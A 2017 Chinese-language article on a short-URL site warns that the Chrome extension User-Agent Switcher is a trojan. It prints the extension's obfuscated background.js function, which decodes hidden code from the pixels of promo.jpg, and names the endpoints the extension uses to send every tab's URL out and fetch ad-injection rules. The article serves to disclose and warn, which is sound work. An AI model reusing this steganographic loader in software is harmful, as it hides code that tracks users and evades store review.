当前位置:首页 > 短网址资讯 > 正文内容

大家一定注意了 Chrome 的插件 User-Agent Switcher 是个木马!

www.ft12.com8年前 (2017-09-10)短网址资讯4180
hrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {            if ("" === '../promo.jpg') return "";            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];            if (c.data.every(function(t) {                    return 0 === t
                })) return "";
            var m, s;            if (1 === o)                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 


扫描二维码推送至手机访问。

版权声明:本文由短链接发布,如需转载请注明出处。

本文链接:https://www.ft12.com/article_469.html

标签: chrome木马插件短链接
分享给朋友:
返回列表

上一篇:硬件巨头正在崛起,中国独占鳌头

下一篇:巨头纷纷布局,长租公寓前景并非一片光明

相关文章

网易严选开通海外配送服务 发力海外市场?

网易严选开通海外配送服务 发力海外市场?

【FT12短网址】2017年9月27日消息,FT12短网址获悉,日前,网易严选发布《海外及港澳台地域物流配送公告》,这意味着海外的消费者也能在网易严选停止购物且网易严选能直接把产品发送到海外消费者手上。该公告指出,值此中秋佳节之际,网易严选...

纳尼,mysqldump导出的数据居然少了40万?

纳尼,mysqldump导出的数据居然少了40万?

0、导读用mysqldump备份数据时,加上 -w 条件选项过滤部分数据,发现导出结果比实际少了40万,什么情况?本文约1500字,阅读时间约5分钟。1、问题我的朋友小文前几天遇到一个怪事,他用mysqldump备份数据时,加上了 -w 选...

类似http://t.cn/xxxxx的短链接如何生成?

类似http://t.cn/xxxxx的短链接如何生成?

很多人在营销推广中都要使用到短网址,新浪短网址是大家最先接触到的,服务也很稳定,所以需求量也很大。据不完全统计,大概每天有几十亿条t.cn短链接生成。如此巨大的数量,难道都是先登录新浪微博,然后发布微博自动生成短链接?这种方法有两个弊端。第...

为了抢夺抢中国游客,马云与万豪国际设合资公司

北京时间8月7日晚间消息,据彭博报道,阿里巴巴与万豪国际合作,大力推动自己的旅行服务。万豪是全球最大的酒店经营商,旗下6,000多家酒店遍及全球。  两边将成立一个合资公司,在阿里巴巴旗下的飞猪(Fliggy)网站上推广万豪旗下的酒店,包括...

FT12短网址对科大讯飞2017半年报及人工智能战略的解读

FT12短网址对科大讯飞2017半年报及人工智能战略的解读

[ FT12短网址资讯 ] 2017年8月10日,科大讯飞应邀在合肥举行投资者交流会。董事长刘庆峰、高级副总裁兼董秘江涛、财务总监张少兵对公司半年报及人工智能战略进行了详细解读,并现场回答了投资者及网友十分关注的问题。鄙人一直对科大讯飞这几...

没有结尾,菜鸟顺丰事件仅仅只个是开始

没有结尾,菜鸟顺丰事件仅仅只个是开始

[ 短网址资讯 ] 一场不大不小的争端,终究将顺丰的位置再一次提升,“炸出”了多位实力战友,在阿里身上失掉的利益,在他人身上能够“赚”回来,可是阿里失掉顺丰,质量快递方面怎样保障?没有诬蔑“灵通系”的意思,毕竟快递质量在...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。

Copyright ft12.com All Rights Reserved.